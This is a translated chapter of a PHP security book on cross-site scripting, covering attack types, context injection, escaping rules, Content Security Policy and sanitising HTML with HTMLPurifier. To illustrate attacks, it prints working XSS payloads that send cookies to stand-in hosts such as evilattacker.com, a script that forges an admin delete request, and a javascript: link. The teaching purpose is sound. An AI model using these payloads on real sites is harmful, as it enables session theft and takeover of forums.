The book "Security in PHP" (part 3). Cross-site scripting (XSS)

The book "Security in PHP" (part 1)
The book "Security in PHP" (part 2)

Cross-site scripting (XSS) is perhaps the most common type of vulnerability in web applications. According to statistics, about 65% of sites are vulnerable to XSS attacks in one form or another. That figure should scare you as much as it scares me.

What is cross-site scripting?

An XSS attack occurs when an attacker is able to inject a script (often JavaScript) into a page served by a web application and have it executed in the client's browser. This is usually done by switching from the HTML data context into a script context, most often by injecting new HTML, JavaScript, or CSS markup. HTML offers plenty of places where executable script can be added to a page, and browsers provide many ways to do so. Any input to a web application, such as HTTP request parameters, can carry the injected code.

One of the problems with XSS is that programmers consistently underestimate it, which is unusual for a vulnerability this serious. Developers often do not realize the degree of the threat and build defenses based on misconceptions and bad practices. This is especially true of PHP code written by developers without sufficient skills and knowledge. In addition, real-life examples of XSS attacks look simple and naive, so programmers who study them consider their own protection sufficient as long as it suits them. It is not difficult to see where the 65% of vulnerable sites come from.

If an attacker can inject JavaScript into a web page and have it executed, he can run any JavaScript in the user's browser, which gives him complete control. From the browser's point of view, the script came from the web application, which is automatically treated as a trusted source.

So here is a reminder: any data that was not created by PHP itself for the current request is untrusted. This also applies to the browser, which operates separately from the web application.

The browser trusts everything it receives from the server, and this is one of the root causes of cross-site scripting. Fortunately, the problem is solvable, as we will discuss below.

We can apply this principle even more broadly, to the JavaScript application environment in the browser itself. Client-side JavaScript ranges from very simple to extremely complex, and is often a separate client-side web application in its own right. Such applications should be protected no less carefully than any other. They should not trust data received from remote sources (including the application on the server); they should validate it and make sure that content rendered into the DOM is correctly escaped or sanitised.

Injected scripts can be used for a variety of tasks, including:

stealing cookies and authorization data,
performing HTTP requests on behalf of the user,
redirecting users to infected sites,
reading and changing the browser's local storage,
performing complex calculations and sending the results to the attacker's server,
applying browser exploits and downloading malware,
emulating user activity for clickjacking,
rewriting or taking control of browser applications,
attacking browser extensions,

and so on; the list is practically endless.

Interface spoofing (UI Redress, clickjacking)

Although it is a distinct attack in its own right, clickjacking is tightly linked with cross-site scripting, because both use similar sets of attack vectors. Sometimes the two are hard to tell apart, because each technique can help the other succeed.

Interface spoofing is any attempt by an attacker to change the user interface of a web application. It allows the attacker to inject new links and new HTML, to resize, hide, or overlay the original interface, and so on. If such an attack is carried out to trick the user into clicking an injected link or button, it is usually called clickjacking.

Most of this chapter deals with interface spoofing by means of XSS. However, there are other spoofing methods that rely on frames for injection. We will discuss them in more detail in Chapter 4.

Cross-site scripting example

Let's imagine that an attacker stumbles upon a forum that lets users display a small signature under their comments. The attacker creates an account, spams every topic within reach, and uses the following signature on his messages:

<script>document.write('<iframe src="http://evilattacker.com?cookie=' + encodeURIComponent(document.cookie) + '" height=0 width=0 />');</script>

By some miracle, the forum engine includes this signature in all the spammed topics, and users' browsers begin to load this code. The result is obvious. The attacker injects an iframe into the page, which appears as a tiny dot (zero size) at the very bottom of the page and attracts no attention. The browser sends a request for the iframe content, and the cookie values of each forum participant are passed to the attacker's URI as a GET parameter. They can be collated and used for further attacks. Ordinary participants are of little interest to the attacker, but well-planned trolling will undoubtedly attract the attention of a moderator or administrator, whose cookies can be very useful for gaining administrative access to the forum.

This is a simple example, but it can be extended. Suppose the attacker wants to know the username associated with the stolen cookies. Easy! It is enough to add DOM query code that reads the name and includes it in a username= GET parameter of the attacker's URL. Or does the attacker need browser information to get around session fingerprinting? It is enough to include the data from navigator.userAgent.

This simple attack has many consequences. For example, the attacker can obtain administrator rights and control over the forum. Do not underestimate what an XSS attack can do.

Of course, the attacker's approach in this example has a flaw. Consider the obvious defense: all cookies with sensitive data are flagged HttpOnly, which prevents JavaScript from reading them. Even so, remember that if an attacker can inject JavaScript, that script can do anything. If the attacker cannot get at the cookie and use it directly, he will do what all good programmers do: write code for an efficient automated attack.

 <script>
 var params = 'type=topic&action=delete&id=347';
 var http = new XMLHttpRequest();
 http.open('POST', 'forum.com/admin_control.php', true);
 http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
 http.setRequestHeader("Content-length", params.length);
 http.setRequestHeader("Connection", "close");
 http.onreadystatechange = function() {
     if (http.readyState == 4 && http.status == 200) {
         // Do something else.
     }
 };
 http.send(params);
 </script>

The code above is one way to send a POST request that deletes a forum topic. It can be set up to run only for a moderator (for example, if the username is displayed somewhere on the page, the script can compare it with a list of known moderators or look for special styles applied to moderators).

As the above shows, HttpOnly cookies are of limited use as protection against XSS. They block the theft of cookies but do not prevent their use during an XSS attack. In addition, an attacker who does not want to be detected would prefer not to leave traces in the visible markup.
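As a minimal sketch of the HttpOnly flag discussed above, the snippet below builds the options for PHP's setcookie(). The helper name sessionCookieOptions and the cookie name in the usage comment are hypothetical, and the options-array form of setcookie() assumes PHP 7.3 or later. As the text notes, this only stops scripts from reading the cookie; it does not stop an injected script from sending requests that carry it.

```php
<?php
// Hypothetical helper: options for a cookie that JavaScript cannot read.
function sessionCookieOptions(int $lifetimeSeconds, int $now): array
{
    return [
        'expires'  => $now + $lifetimeSeconds,
        'path'     => '/',
        'httponly' => true, // hidden from document.cookie
    ];
}

// Inside a web request (PHP 7.3+), assuming $sessionId is already generated:
// setcookie('session_id', $sessionId, sessionCookieOptions(3600, time()));
```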

Types of XSS Attacks

XSS attacks can be classified in several ways. One is by how the malicious input reaches the web application. Input to the application can be included in the output of the current request, stored for inclusion in the output of a later request, or passed to JavaScript-based DOM operations. This gives the following types of attack.

Reflected XSS attack

Here, untrusted input sent to the web application is immediately included in the application's output, i.e. it is "reflected" from the server back to the browser within the same request. Reflection happens with error messages, search results, post previews, and so on. This form of attack relies on convincing the user to follow a link or submit a form prepared by the attacker. Getting the user to click on an untrusted link may require social engineering, an interface spoofing attack, or a link shortening service. Social networks and link shortening services are themselves particularly exposed to URL spoofing with shortened links, since such links are common there. Be careful and check what you click!

Stored XSS attack

When the malicious payload is stored somewhere and retrieved later as a user views the data, the attack is a stored one. Besides databases, there are many other places suitable for long-term storage, including caches and logs. Attacks that inject payloads into logs are already known.

DOM-based XSS attack

A DOM-based attack can be either reflected or stored. The difference lies in what the attack targets. Most attacks try to change the markup of the HTML document directly. However, HTML can also be modified from JavaScript through the DOM. Elements successfully injected into the HTML can later be used in DOM operations in JavaScript. Such attacks also target vulnerabilities in JavaScript libraries or their incorrect use.

Cross-site scripting and context injection

An XSS attack succeeds by injecting a context. The term "context" describes how browsers interpret the contents of an HTML document. Browsers recognize a number of key contexts, including the HTML body, HTML attributes, JavaScript, URLs, and CSS.

The attacker's goal is to take data intended for one of these contexts and force the browser to interpret it in another context. For example:

 <div style="background:<?php echo $colour ?>;">

$colour is filled from a database of user settings and sets the background color of a text block. The value is injected into a CSS context, which is a child of an HTML attribute context. That is, we have added CSS to the style attribute. It may not seem necessary to guard against such a context trap, but look at the following example:

 <?php
 $colour = "expression(document.write('<iframe src="
     . "http://evilattacker.com?cookie=' + encodeURIComponent(document.cookie) + "
     . "' height=0 width=0 />'))";
 ?>
 <div style="background:<?php echo $colour ?>;">

If an attacker manages to set this color, he injects a CSS expression that will execute JavaScript in Internet Explorer. In other words, the attacker is able to switch out of the current context by injecting a new JavaScript context.

Looking at the previous example, some readers will think of escaping. Let's use it:

 <?php
 $colour = "expression(document.write('<iframe src="
     . "http://evilattacker.com?cookie=' + encodeURIComponent(document.cookie) + "
     . "' height=0 width=0 />'))";
 ?>
 <div style="background:<?php echo htmlspecialchars($colour, ENT_QUOTES, 'UTF-8') ?>;">

If you check it in IE, you will quickly find that something very bad is happening. The XSS attack still succeeds, even after $colour has been escaped with htmlspecialchars()!

This shows how important it is to understand context correctly. Each context requires a different escaping method, because each has its own special characters and its own escaping needs. It is not enough to scatter htmlspecialchars() and htmlentities() everywhere and pray that your web application is safe.

What went wrong in the previous example? Why did the attack succeed despite HTML escaping? The browser decodes HTML attribute values before interpreting the context inside them, and we ignored the fact that two contexts needed escaping.

First, $colour should have been CSS-escaped, and only then HTML-escaped. This would ensure that $colour is converted into a proper string literal, without the brackets, quotes, spaces, and other characters that allow expression() to be injected. Not realizing that our attribute spanned two contexts, we escaped it as if it were a plain HTML attribute. It is quite a common mistake.

The lesson here is that context matters. In an XSS attack, the attacker will always try to jump from the current context into another one where JavaScript can be executed. If you can identify all the contexts in your HTML output, including how they are nested, you are ten steps closer to protecting a web application from XSS.
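The two-step escaping described above (CSS first, then HTML) can be sketched as follows. This is only an illustration under stated assumptions: cssEscape and styleBackground are hypothetical helpers, not PHP built-ins, the input is assumed to be valid UTF-8, and a maintained escaper class is preferable in real code.

```php
<?php
// Hypothetical helper: hex-escape every ASCII character that is not a letter
// or digit, using the CSS "\HEX " form. Bytes >= 0x80 are left untouched,
// which assumes the input is valid UTF-8.
function cssEscape(string $value): string
{
    return preg_replace_callback(
        '/[^a-zA-Z0-9\x80-\xFF]/',
        static function (array $m): string {
            return sprintf('\\%X ', ord($m[0]));
        },
        $value
    );
}

// CSS-escape first (inner context), then HTML-escape (outer attribute context).
function styleBackground(string $colour): string
{
    $css  = cssEscape($colour);
    $attr = htmlspecialchars('background:' . $css . ';', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div style="' . $attr . '">';
}
```

With this sketch, a value such as red passes through unchanged, while the brackets and quotes needed for expression(...) are turned into harmless CSS escapes before the HTML escaping is applied.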

Let's look at another example:

 <a href="http://www.example.com">Example.com</a>

Leaving untrusted input aside for the moment, this markup can be analyzed as follows:

There is a URL context, i.e. the value of the href attribute.
There is an HTML attribute context, i.e. the parent of the URL context.
There is an HTML body context, i.e. the text inside the <a> tag.

These are three different contexts, so up to three escaping methods are needed if the data comes from untrusted sources. In the next section we take a closer look at escaping as a defense against XSS.
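To make the three contexts concrete, here is a small sketch that builds such a link from untrusted values. The function names and the /search?q= URL layout are assumptions made for illustration; only rawurlencode() and htmlspecialchars() are actual PHP functions.

```php
<?php
// HTML escaping for the attribute and body contexts.
function escHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical example: a link whose query value and label are untrusted.
function searchLink(string $query, string $label): string
{
    // URL context: encode the untrusted value as a URL component.
    $url = 'http://www.example.com/search?q=' . rawurlencode($query);

    // HTML attribute context (quoted href) and HTML body context (link text).
    return '<a href="' . escHtml($url) . '">' . escHtml($label) . '</a>';
}
```

Here the base URL is fixed by the application; when the whole URL is untrusted, it also has to be validated, since escaping does nothing against a javascript: address.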

Cross-site scripting protection

It is possible to protect against XSS, but the protection must be applied consistently, without exceptions or shortcuts, and preferably from the very beginning of development, while the application's workflow is still fresh in everyone's mind. Adding protection at later stages can be expensive.

Input Validation

Input validation is only the first line of defense for a web application. With this type of protection we know only how the untrusted data is used right now; at the moment the data is received, we cannot predict where and how it will be used later. This is a problem for almost all text data, since we must always allow the user to type quotes, angle brackets, and other characters.

Validation works best at preventing XSS in data with a restricted set of valid values. An integer, for example, should never contain HTML special characters. A parameter such as a country name should match a predefined list of real countries, and so on.

Input validation also helps with data that has a specific syntax. For example, a valid URL must begin with the http:// or https:// prefix, not with the far more dangerous javascript: or data: schemes. In fact, every address obtained from untrusted input should be checked for these schemes. Escaping a javascript: or data: URI has the same effect as escaping a legitimate URL, that is, no effect at all.

Although input validation cannot block every malicious payload in an XSS attack, it can stop the most obvious types of attack. Input validation was discussed in detail in the second part of the book.
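The two cases just mentioned, an integer and a value from a fixed list, might be validated along these lines. The function names and the sample country list are hypothetical; filter_var() and in_array() are standard PHP.

```php
<?php
// Returns the integer if $raw is a positive integer, otherwise null.
function validatePositiveInt($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Returns the value only if it appears in the predefined list (strict comparison).
function validateCountry(string $raw, array $allowed): ?string
{
    return in_array($raw, $allowed, true) ? $raw : null;
}
```

A null result means the input should be rejected rather than repaired.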
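A scheme check of the kind described above could look like the following sketch. The function name isHttpUrl is an assumption; it relies only on PHP's parse_url() and accepts nothing but http and https URLs that have a host.

```php
<?php
// Accept only absolute http:// or https:// URLs with a host part.
function isHttpUrl(string $url): bool
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    $host   = parse_url($url, PHP_URL_HOST);

    if (!is_string($scheme) || !is_string($host) || $host === '') {
        return false;
    }

    return in_array(strtolower($scheme), ['http', 'https'], true);
}
```

Checking against a list of allowed schemes is safer than trying to list the dangerous ones, because anything unexpected is rejected by default.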

Escaping (and encoding)

Escaping data on output ensures that the data will not be misinterpreted by the parser or interpreter that receives it. The obvious examples are the "less than" and "greater than" signs, which delimit HTML tags. If these characters are allowed through from untrusted input, the attacker can introduce new tags that the browser will render. Typically, these characters are replaced with the sequences &gt; and &lt;.

Replacing characters this way preserves the meaning of the escaped data. Escaping simply replaces characters that have a special meaning with alternative representations. Typically a hexadecimal representation is used, or something more readable such as HTML entities (where they are safe to use).

As mentioned in the section on contexts, the escaping method depends on the type of content the data is injected into. HTML escaping differs from JavaScript escaping, which in turn differs from URL escaping. Applying the wrong escaping strategy for a given context can make the protection ineffective and create vulnerabilities that an attacker can exploit.

To make escaping easier, it is recommended to use a separate class designed for the purpose. PHP does not provide all the necessary escaping functions out of the box, and much of what it does provide is not as safe as most developers believe.
Let's look at the escaping rules that apply to the most common contexts: HTML body, HTML attributes, JavaScript, URLs, and CSS.

Never inject data except in allowed locations.

Before looking at escaping strategies, make sure that your web application templates do not misplace data. This refers to injecting data into sensitive areas of HTML that give an attacker the ability to influence how the markup is processed, and that normally need no escaping when written by the programmer. Consider these examples, where ... is the injected data:

 <script>...</script>
 <!--...-->
 <div ...="test"/>
 <... href="http://www.example.com"/>
 <style>...</style>

Each of these locations is dangerous. Allowing data inside a script tag, outside of string and numeric literals, lets an attacker inject JavaScript. Data placed in HTML comments can be used to trigger Internet Explorer conditional comments and other unforeseen behavior. The next two are more obvious: nobody would let an attacker influence tag or attribute names, which is exactly what we are trying to prevent! Finally, as with scripts, we cannot let attackers inject directly into CSS, because that enables interface spoofing attacks and script execution through expression(), which Internet Explorer supports.

Always HTML-escape data before injecting it into the HTML body.

The HTML body context refers to text content enclosed in tags, for example the text between <body> or <div> tags, or any other paired tags that hold text. Data injected into the content of any tag must be HTML-escaped.

In PHP, HTML escaping is well known in the form of the htmlspecialchars() function.
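A minimal sketch of HTML-body escaping with htmlspecialchars() follows. The wrapper name escapeHtmlBody is hypothetical, and the choice of flags and the explicit UTF-8 charset are assumptions about the application rather than requirements stated in the text.

```php
<?php
// Hypothetical wrapper that fixes the flags and charset in one place.
function escapeHtmlBody(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Usage in a template, assuming $comment holds untrusted text:
// echo '<div>' . escapeHtmlBody($comment) . '</div>';
```

Wrapping the call keeps the flags consistent across templates, so no call site forgets ENT_QUOTES or the character set.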

Always HTML-attribute-escape data before injecting it into the HTML attribute context.

The HTML attribute context refers to all attribute values of an element, with the exception of attributes that the browser interprets as CDATA. This exception is rather confusing, but it mainly concerns HTML standards that are not XML-based, where JavaScript can be included in event attributes unescaped. For all other attributes, you have the following two options:

If the attribute value is in quotes, then you MAY use HTML escaping.
However, if the value is given without quotes, then you MUST use HTML attribute escaping.

The second option also applies whenever the attribute quoting rules may be unclear. For example, in HTML5 it is considered perfectly acceptable to use unquoted attribute values, and real projects already contain many examples of this "clever" approach. When in doubt, proceed with caution.

Always JavaScript-escape data before injecting it into JavaScript data values.

Data values in JavaScript are mostly strings. Since numbers cannot be escaped, there is an additional rule: always validate numbers ...
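For the unquoted case, an attribute escaper has to neutralise spaces, equals signs, and every other character that could end the value. The sketch below is a simplified illustration, not a complete implementation: escapeHtmlAttr is a hypothetical name, the input is assumed to be valid UTF-8, and bytes at or above 0x80 are passed through unchanged.

```php
<?php
// Hypothetical helper: replace every ASCII character except letters, digits,
// comma, period, underscore, and hyphen with a hexadecimal character reference.
function escapeHtmlAttr(string $value): string
{
    return preg_replace_callback(
        '/[^a-zA-Z0-9,._\x80-\xFF-]/',
        static function (array $m): string {
            return sprintf('&#x%02X;', ord($m[0]));
        },
        $value
    );
}

// Usage with an unquoted attribute, assuming $class is untrusted:
// echo '<div class=' . escapeHtmlAttr($class) . '>';
```

Because the space and the equals sign are encoded, an input such as "x onmouseover=alert(1)" stays a single attribute value instead of adding a new attribute.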
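As a rough illustration of the rule for strings and numbers, the sketch below uses json_encode() with the JSON_HEX_* flags. This is a commonly available substitute rather than a dedicated JavaScript escaper of the kind the text has in mind; the helper names are hypothetical, and JSON_THROW_ON_ERROR assumes PHP 7.3 or later.

```php
<?php
// Hypothetical helper: encode a PHP string as a JavaScript string literal
// that is also safe to place inside an HTML <script> block.
function jsString(string $value): string
{
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Numbers cannot be escaped, so they are validated instead.
function jsInt($raw): int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT);
    if ($n === false) {
        throw new InvalidArgumentException('Not an integer');
    }
    return $n;
}

// Usage in a template, assuming $name and $count are untrusted:
// echo '<script>var name = ' . jsString($name) . '; var count = ' . jsInt($count) . ';</script>';
```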

Content Security Policy

A key element in all our discussion of cross-site scripting is that the browser unquestioningly executes all JavaScript it receives from the server, regardless of where that code originated. When it retrieves an HTML document, the browser has no way of knowing which of the embedded resources are safe and which are not. What if we could change that?

Content Security Policy (CSP) is an HTTP header that gives the browser a white list of trusted resource sources. Any source not on the list is considered untrusted and is simply ignored. Consider the following:

 X-Content-Security-Policy: script-src 'self'

This CSP header tells the browser to trust only JavaScript source URLs that point to the current domain. The browser will then load scripts from this source and completely ignore all others. This means that http://attacker.com/naughty.js will not load even if an attacker somehow manages to inject it. In addition, all inline scripts, for example <script> tags, javascript: URIs, and event attribute content, are ignored as well, because they are not on the white list.

If you need to use JavaScript from a source other than the current domain, you can add it to the white list. For example, let's add the jQuery CDN address.

 X-Content-Security-Policy: script-src 'self' http://code.jquery.com

You can add other resource directives, such as one for CSS style sheets, separating each directive, together with its allowed sources, from the next with a semicolon.

 X-Content-Security-Policy: script-src 'self' http://code.jquery.com; style-src 'self'

The format of the header value is very simple. The value consists of a directive name such as script-src, followed by a space-separated list of sources that serves as the white list. A source can be a quoted keyword, such as 'self', or a URL. Each resource URL is matched against this list. A part that is left out of a listed source, such as the path, is not restricted. Note that http://code.jquery.com prevents scripts from being loaded from http://jquery.com or http://domainx.jquery.com, because we were explicit about which domain is allowed. To allow all subdomains, you can use a wildcard source such as http://*.jquery.com. The same level of specificity applies to paths, ports, URL schemes, and so on.

The essence of the CSP white list is simple. If you define a list for a particular resource type, anything that is not on the list will not load. If you do not define a list for a resource type, and no default-src directive covers it, the browser's default behaviour applies to resources of that type.
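On the PHP side, a policy like the ones above can be assembled from an array and sent with header(). The sketch below is only one possible arrangement: buildCspValue is a hypothetical helper and the policy contents are taken from the examples in the text. Current browsers use the standardized header name Content-Security-Policy; the X- prefixed names shown in this article date from the draft stage of the specification.

```php
<?php
// Hypothetical helper: turn ['directive' => [sources...]] into a header value.
function buildCspValue(array $directives): string
{
    $parts = [];
    foreach ($directives as $name => $sources) {
        $parts[] = $name . ' ' . implode(' ', $sources);
    }
    return implode('; ', $parts);
}

$policy = [
    'script-src' => ["'self'", 'http://code.jquery.com'],
    'style-src'  => ["'self'"],
];

// In a web request, before any output is sent:
// header('Content-Security-Policy: ' . buildCspValue($policy));
```

Keeping the policy in a data structure makes it easier to review the white list and to emit the same value under more than one header name if older browsers must be supported.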

The following resource directives are supported:

connect-src: restricts the sources you can connect to using XMLHttpRequest, WebSockets, etc.
font-src: restricts sources for web fonts.
frame-src: restricts the URLs for frames.
img-src: restricts image sources.
media-src: restricts the sources of video and audio.
object-src: restricts sources for Flash and other plugins.
script-src: restricts sources for script files.
style-src: restricts sources for CSS.

To set safe defaults, there is a special directive, default-src, which sets the initial white list for all of the categories listed above.

 X-Content-Security-Policy: default-src 'self'; script-src 'self' http://code.jquery.com

This limits the allowed resources to the current domain, but also adds an exception for the jQuery script.

Besides URLs, a source can be one of the following keywords:

 'none' 'self' 'unsafe-inline' 'unsafe-eval'

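Notice the word "unsafe" in two of these keywords. The best way to apply CSP is to avoid using the attacker's own techniques. Attackers want to inject inline scripts and other inline resources. If the application itself never uses inline scripts, the browser can be told to ignore all inline resources without exception. That means moving scripts into external files and attaching handlers with addEventListener() instead of event attributes. But surely every rule needs a few useful exceptions? Not this way. Make no exceptions. Adding 'unsafe-inline' to the white list defeats the purpose of using CSP.

The 'none' keyword means exactly what it says. Used as a source, it tells the browser to ignore all resources of that type. It makes a sensible starting point: set default-src to 'none' so that the CSP white list permits only what is explicitly allowed, for example: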

 X-Content-Security-Policy: default-src 'none'; script-src 'self' http://code.jquery.com; style-src 'self'

One last detail. CSP is still an emerging standard, so the X-Content-Security-Policy header has to be duplicated for WebKit-based browsers such as Safari and Chrome. WebKit uses its own header name.

 X-Content-Security-Policy: default-src 'none'; script-src 'self' http://code.jquery.com; style-src 'self'
 X-WebKit-CSP: default-src 'none'; script-src 'self' http://code.jquery.com; style-src 'self'

HTML sanitisation

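Sooner or later a web application needs to include externally supplied HTML markup in a page without escaping it. Obvious examples are forum posts, blog comments, edit forms, and entries from RSS or Atom feeds. If such markup were escaped it would not render correctly, so instead it has to be carefully filtered to neutralise anything dangerous.

Note that this concerns HTML that is "externally determined", not only HTML that is "externally generated". Instead of accepting HTML directly, many web applications let users write in an alternative markup such as BBCode, Markdown, or Textile. A common misconception in PHP is that these markup languages provide protection against XSS. They do not. Their purpose is to let users write formatted text without dealing with HTML. Not every user is a programmer, and HTML, with its SGML roots, is not easy to write. Writing long passages of formatted text in HTML is painful.

These markup languages are eventually rendered into HTML. The renderer's job is conversion, not security, so the HTML it produces cannot simply be assumed to be "safe". It has to be treated like any other untrusted HTML.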

 [url=javascript:alert('I can haz Cookie?\n'+document.cookie)]Free Bitcoins Here![/url]

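BBCode renderers generate HTML, but they do not necessarily check what they generate. Here, for example, nothing verifies that the URL is an HTTP URL. The same goes for Markdown:

 I am a Markdown paragraph.<script>document.write('<iframe src="http://attacker.com?cookie=' + encodeURIComponent(document.cookie) + '" height=0 width=0 />');</script>
 There's no need to panic. I swear I am just plain text!

Markdown is a popular alternative to writing HTML, but it also allows HTML to be mixed into Markdown. Consequently, Markdown by itself offers no protection against XSS attacks.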

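So, any HTML that is going to be included in the output unescaped has to be sanitised after all generation, rendering, and other processing is complete. No exceptions. Until it has been sanitised, it is untrusted input.

HTML sanitisation is a laborious process: the input is parsed, and a white list of allowed elements, attributes, and values is applied to it. It is easy to get wrong, and PHP has a long history of libraries that claim to do it properly but are insecure. Use an established, reputable solution rather than writing your own.

For PHP, the library recommended for HTML sanitisation is HTMLPurifier. It is actively maintained, has been heavily reviewed, and I strongly recommend it. Using HTMLPurifier is fairly simple once you know which HTML markup you want to allow: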

 // Basic setup without a cache.
 // Assumes the HTMLPurifier library is already loaded (for example via its autoloader).
 $config = HTMLPurifier_Config::createDefault();
 $config->set('Core.Encoding', 'UTF-8');
 $config->set('HTML.Doctype', 'HTML 4.01 Transitional');
 // Create the white list: basic formatting and links
 $config->set('HTML.Allowed', 'p,b,a[href],i');
 $sanitiser = new HTMLPurifier($config);
 $output = $sanitiser->purify($untrustedHtml);

Do not use any other HTML sanitiser unless you are absolutely sure of what you are doing.


Source: https://habr.com/ru/post/352442/
